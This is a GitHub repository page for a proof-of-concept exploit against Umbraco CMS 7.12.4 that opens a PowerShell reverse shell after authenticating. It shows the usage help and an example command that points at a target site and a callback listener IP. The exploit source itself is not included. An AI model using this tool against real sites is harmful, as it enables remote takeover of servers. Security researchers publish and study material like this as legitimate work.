Skip to content
/ Umbraco-RCE Public

Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution

License

Apache-2.0 license
13 stars 3 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Jonoans/Umbraco-RCE

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
exploit.cs
exploit.cs
 
 
exploit.py
exploit.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

Umbraco RCE PowerShell Reverse Shell PoC

Usage

usage: exploit.py [-h] -u USER -p PASS -w URL -i IP

Umbraco authenticated RCE

optional arguments:
  -h, --help                 show this help message and exit
  -u USER, --user USER       Username / Email
  -p PASS, --password PASS   Login password
  -w URL, --website-url URL  Root URL
  -i IP, --ip IP             IP address of callback listener

Examples:

python exploit.py -u [email protected] -p password123 -w 'http://remote.website/' -i 10.10.10.1

Requirements

To install dependencies:

pip install -r requirements.txt

Reference

This is a touch-up of noraj's PoC which is based off EDB-ID-46153.
This version provides a PowerShell reverse shell upon execution.

About

Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution

Topics

proof-of-concept exploit python3 poc rce umbraco-cms umbraco-v7 remote-code-execution

Resources

Readme

License

Apache-2.0 license
Activity

Stars

13 stars

Watchers

0 watching

Forks

3 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages